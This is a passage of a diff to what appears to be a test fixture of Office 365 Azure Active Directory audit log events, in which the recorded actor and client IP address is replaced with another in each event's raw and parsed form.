APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -10058,9 +10058,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:17:00", "ExtendedProperties": [ { @@ -10294,7 +10294,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -10324,9 +10324,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:17:00", "ExtendedProperties": [ { @@ -10560,7 +10560,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 